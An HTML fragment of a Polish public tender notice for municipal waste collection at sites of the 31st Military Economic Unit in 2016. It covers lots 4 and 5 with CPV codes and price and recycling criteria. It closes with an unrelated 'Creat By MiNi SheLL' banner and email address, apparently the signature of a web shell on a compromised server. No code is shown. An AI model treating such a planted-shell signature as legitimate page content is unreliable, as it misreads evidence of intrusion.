<li>1. Cena - 95</li>
<li>2. Poziom recyklingu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 (Regny ,Gałkówek) Usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 4 zawierający min. miejsca odbioru odpadów,  ilości, częstotliwość odbioru  określa specyfikacja techniczna       ( załącznik nr 1 do umowy ) oraz formularz cenowy  ( załącznik nr 1d do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
Lokalizacja obiektów
Zadanie nr 4  ( Regny , Gałkówek ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Poziom recyklingu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 (Kutno,Skierniewice) Usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 5 zawierający min. miejsca odbioru odpadów,  ilości, częstotliwość odbioru  określa specyfikacja techniczna       ( załącznik nr 1 do umowy ) oraz formularz cenowy ( załącznik nr 1e do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
Lokalizacja obiektów
Zadanie nr 5  ( Kutno , Skierniewice ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Poziom recyklingu - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com